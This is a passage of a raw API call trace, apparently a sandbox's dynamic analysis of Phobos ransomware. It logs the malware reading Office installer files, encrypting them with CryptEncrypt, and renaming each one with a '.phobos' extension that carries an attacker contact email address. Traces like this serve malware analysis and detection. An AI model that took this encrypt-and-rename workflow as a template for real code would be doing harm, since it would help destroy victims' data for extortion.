ReadFile (in: hFile=0x180, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0160.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ce8) returned 1 [0160.812] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0160.812] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0160.819] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.819] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0160.819] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0160.976] SetEndOfFile (hFile=0x180) returned 1 [0160.976] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0160.976] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0160.978] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0160.978] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0160.980] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0160.980] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0160.981] CloseHandle (hObject=0x180) returned 1 [0160.981] SetEvent (hEvent=0xe8) returned 1 [0160.982] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0160.982] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0161.021] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=174440) returned 1 [0161.021] CloseHandle (hObject=0x130) returned 1 [0161.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0161.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.022] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0161.022] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0161.022] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0161.022] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.022] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0161.022] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0161.022] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2a968, lpOverlapped=0x0) returned 1 [0161.033] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a970, dwBufLen=0x2a970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a970) returned 1 [0161.035] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2a970, lpOverlapped=0x0) returned 1 [0161.038] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0161.038] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0161.038] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0161.038] CryptDestroyKey (hKey=0xa32d28) returned 1 [0161.038] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0161.038] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.038] CloseHandle (hObject=0x130) returned 1 [0161.038] CloseHandle (hObject=0x138) returned 1 [0161.038] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0161.040] SetEvent (hEvent=0xe8) returned 1 [0161.040] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0161.040] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.041] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=7378792) returned 1 [0161.041] CloseHandle (hObject=0x138) returned 1 [0161.041] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0161.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0161.041] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.041] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0161.041] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0161.042] ReadFile (in: hFile=0x138, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0161.111] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0161.111] ReadFile (in: hFile=0x138, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0161.138] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0161.138] ReadFile (in: hFile=0x138, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0161.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32da8) returned 1 [0161.297] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0161.303] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.303] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0161.303] WriteFile (in: hFile=0x138, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0161.622] SetEndOfFile (hFile=0x138) returned 1 [0161.623] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0161.623] WriteFile (in: hFile=0x138, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0161.624] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0161.624] WriteFile (in: hFile=0x138, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0161.626] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0161.626] WriteFile (in: hFile=0x138, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0161.627] CloseHandle (hObject=0x138) returned 1 [0161.628] SetEvent (hEvent=0xe8) returned 1 [0161.628] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0161.628] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0161.686] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=36233052) returned 1 [0161.686] CloseHandle (hObject=0x130) returned 1 [0161.686] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0161.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0161.689] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0161.689] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0161.689] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0161.689] ReadFile (in: hFile=0x130, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0162.166] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0162.166] ReadFile (in: hFile=0x130, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0162.380] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0162.380] ReadFile (in: hFile=0x130, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0162.419] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32d28) returned 1 [0162.419] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0162.419] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0162.427] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.427] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0162.427] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0162.442] SetEndOfFile (hFile=0x130) returned 1 [0162.443] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0162.443] WriteFile (in: hFile=0x130, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0162.444] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0162.444] WriteFile (in: hFile=0x130, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0162.445] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0162.445] WriteFile (in: hFile=0x130, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0162.446] CloseHandle (hObject=0x130) returned 1 [0162.446] SetEvent (hEvent=0xe8) returned 1 [0162.446] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0162.446] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.487] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=10798080) returned 1 [0162.487] CloseHandle (hObject=0x188) returned 1 [0162.487] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020 [0162.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0162.487] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0162.487] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0162.488] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0162.488] ReadFile (in: hFile=0x188, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0162.971] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0162.971] ReadFile (in: hFile=0x188, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0163.139] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0163.139] ReadFile (in: hFile=0x188, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0163.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ce8) returned 1 [0163.268] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0163.268] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0163.274] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.274] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0163.274] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0163.293] SetEndOfFile (hFile=0x188) returned 1 [0163.293] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0163.294] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0163.295] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0163.295] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0163.297] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0163.297] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0163.298] CloseHandle (hObject=0x188) returned 1 [0163.298] SetEvent (hEvent=0xe8) returned 1 [0163.298] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0163.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0163.298] GetFileSizeEx 